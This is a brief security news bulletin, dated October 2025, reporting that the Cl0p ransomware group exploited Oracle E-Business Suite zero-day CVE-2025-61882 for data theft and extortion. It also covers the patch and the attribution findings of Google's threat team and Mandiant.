389/68 Tuesday, October 7, 2025
Oracle has confirmed that the Cl0p ransomware group was behind attacks and data theft targeting Oracle E-Business Suite (EBS) customers, exploiting a Zero-Day vulnerability tracked as CVE-2025-61882. This critical flaw, rated CVSS 9.8, allows unauthenticated remote code execution and affects Oracle EBS versions 12.2.3 through 12.2.14, specifically within the BI Publishing Integration component under the Concurrent Processing module.
The campaign began in August 2025, when Cl0p exfiltrated data from EBS customers and later initiated ransom emails in late September. Researchers from Google Threat Intelligence Group (GTIG) and Mandiant discovered that these ransom demands were sent from previously compromised accounts linked to the FIN11 cybercrime group, before later confirming that the true perpetrators were Cl0p. The attack patterns closely mirrored previous Cl0p campaigns that abused Zero-Day flaws in products such as MOVEit, Cleo, and Fortra.
Oracle has released a security patch addressing CVE-2025-61882 and published Indicators of Compromise (IoCs) to help customers detect intrusions. Mandiant noted that attackers also leveraged another vulnerability patched in July 2025, raising concerns that other threat actors may adopt this Zero-Day in future operations. The CTO of Mandiant advised organizations to verify whether their systems were compromised-even if patches have already been applied. Furthermore, there are indications that Scattered Spider and ShinyHunters may also be involved, following reports that exploit code for this vulnerability was circulated on Telegram.
Source https://www.securityweek.com/oracle-e-business-suite-zero-day-exploited-in-cl0p-attacks/
